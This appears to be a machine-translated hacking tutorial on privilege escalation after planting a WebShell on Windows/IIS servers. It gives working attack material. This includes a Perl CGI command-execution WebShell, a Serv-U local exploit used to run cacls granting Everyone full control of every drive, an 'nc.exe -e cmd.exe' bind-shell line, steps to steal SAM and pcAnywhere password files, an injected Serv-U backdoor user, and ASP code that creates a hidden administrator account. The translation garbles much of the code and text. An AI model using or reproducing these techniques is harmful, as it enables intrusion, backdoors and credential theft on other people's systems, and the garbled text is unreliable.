Improve WebShell permission
When we get a WebShell, the next thing to do is to improve the permissions individual summary as follows: 1.c: / documents and settings / all users / application data / symantec / pcanywhere See if you can jump to this directory, if you It is best, directly under its CIF file, get a PCANYWHERE password, login 2.c: / winnt / system32 / config Attach it under which it is, the software that cracks the user's password is LC, Saminside3. C: / documents and settings / all users / "Start" menu / program See you can jump, we can get a lot of useful information from here to see a lot of shortcuts, we generally choose Serv-U, then view properties locally After you know the path, you can see if you can jump in, if you have permission to modify servudaemon.ini, add a user to go, password is empty [user = farruh | 1] password = homedir = c: timeout = 600maintence = systemaccess1 = C: / | Rwamelcdpaccess1 = d: / | rwamelcdpskeyvalues = This user has the highest permission, then we can ftp to QUOTE SIXEC XXX to upgrade the permission 4.c: / winnt / system32 / inetsrv / data is this directory It is also ERVERYONE complete control, what we have to do is uploaded the tools of the promotion permissions, and then execute 5. Can you jump to the following directory C: / PHP, use phpspyc: / pra, sometimes this directory (Similarly, you can learn from the cgi's WebShell #! / Usr / bin / perlbinmode (stdout, "content-type: text / html / r / n / r / n", 27 ); $ _ = $ Env {query_string}; s /% 20 / / ig; s /% 2fig; $ exECTHIS = $ _; syswrite (stdout, "
/ r / n", 13); Open (stderr, "> & stdout") || DIE "can't redirect stderr"; system ($ exECTHIS); Syswrite (stdou T, "/ r / n / r / n", 17); Close (stderr); close (stdout); exit; saved as CGI execution, if not, try PL extensions , Change the CGI file just now to the PL file, submit http: //xxxxx ket //cmd.pl? DIR Display "Reject Access", indicating that it can be executed! Submit right now: first upload a Su.exe (SER-U upgrade authority) to the BIN directory http: //xxxxx //cmd.pl? C / perl / bin / su.exe returned: Serv-u> 3.x local expedition by xiaolu usage: serv-u.exe "Command" Example: serv-u.exe "nc.exe -l -p 99 -e cmd.exe" is now IUSR permissions, submit:Http://xxxxxx ket //cmd.pl? c / perl / bin / su.exe "Cacls.exe C: / E / T / G Everyone: f" http: //xxxxxx // /? /? /bin/su.exe "Cacls.exe D: / E / T / G Everyone: f" http://xxxxxx // e e p c / perl / bin / su.exe "Cacls.exe E: / E / T / g everyone: f "http: //xxxxxx ket //cmd.pl? C / perl / bin / su.exe" cacls.exe f: / e / t / g everyone: f "If the following information is returned, It is said that SERV-U> 3.x local exploit by xiaolu <220 serv-u ftp server v5.2 for Winsock Ready ...> User local name, need password. ******* ***************************> Pass # L@ @ 230 user logged in, proceed. *************************************** **************> Site maintenance ************************************************************************************************************************************************************************* ****************************** [ ] Creating new domain ... <200-domainid = 2 <220 Domain Settings Saved *********************************************************** **** [ ] Domain XL: 2 Created [ ] Creating Evil User <200-user = XL 200 User Settings Saved ********************** ******************************* [ ] now Exploiting ...> user xl <331 User name okay, ned password. **************************************************** **********> Pass 111111 <230 user logged in, proceed. ************************************************ ************************** [ ] now Executing: Cacls.exe C: / E / T / G Everyone: F <220 Domain Deleted Such all partitions are completely controlled for Everyone now we will upgrade your users to administrators: http://xxxxxx // h /:?? C u perl / bin / su.exe "net localgroup administrators IUSR_Anyhost / add" 6. can succeed Run "CScript C: /ineTPub/adminscripts/adsutil.vbs Get W3SVC / Inprocessisapiapps" to improve permission to use this CScript c: /inetpub/adminscripts/adsutil.vbs Get W3SVC / Inprocessisapiapps to view DLL files with privileges:
IDQ.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll Add ASP.DLL to the privilege of the privilege group asp.dll is placed in c: /winnt/system32/inetsrv/asp.dll (the location of different machine is not necessarily Same) We now add CScript Adsutil.vbs SET / W3SVC / INPROCESSISAPIAPPS "C: /Winnt/System32/IDQ.dll" "C: /Winnt/System32/inetsrv/httpext.dll" "C: / Winnt / System32 / InetSRV /httpodbc.dll "" c: /winnt/system32/inetsrv/ssinc.dll "" C: /Winnt/System32/msw3prt.dll "" C: /Winnt/System32/inetsrv/asp.dll "can be used with CScript AdsuTil. VBS Get / W3SVC / INPROCESSISAPIAPPS to see if it is added 7. You can also use this code to trial, as if the effect does not significantly <<% response.expires = 0>% @ codepage = 936%> <% response. Expires = 0 on error resume next Session.TimeOut = 50 Server.ScriptTimeout = 3000 set lp = server.createObject ( "WSCRIPT.NETWORK") oz = "WinNT: //" & lp.ComputerName Set ob = GetObject (oz) Set oe = GetObject (Oz & "/ administrators, group") set = obs.create ("user", "wekwen $") od.setpassword "wekwen" <---- password od.setInfo set of = getObject (oz & " / Wekwen $, user ") OE.Add (of.adspath) response.write" Wekwen $ Super account established success! "%> Check if this code is checked for successful enhancement success <% @ codepage = 936%> <% response.expires = 0on Error Resume Next 'Find admin istrators group account Set tN = server.createObject ( "Wscript.Network") Set objGroup = GetObject ( "WinNT: //" & tN.ComputerName & "/ Administrators, group") For Each admin in objGroup.MembersResponse.write admin.Name & "
"NEXTIF Err ThenResponse.write" No: WScript.Network "End IF%> 8.c: / Program Files / Java Web Start This here, if you can, it is generally small, you can try to use JSP's WebShell, I heard permission So small, I have not met.
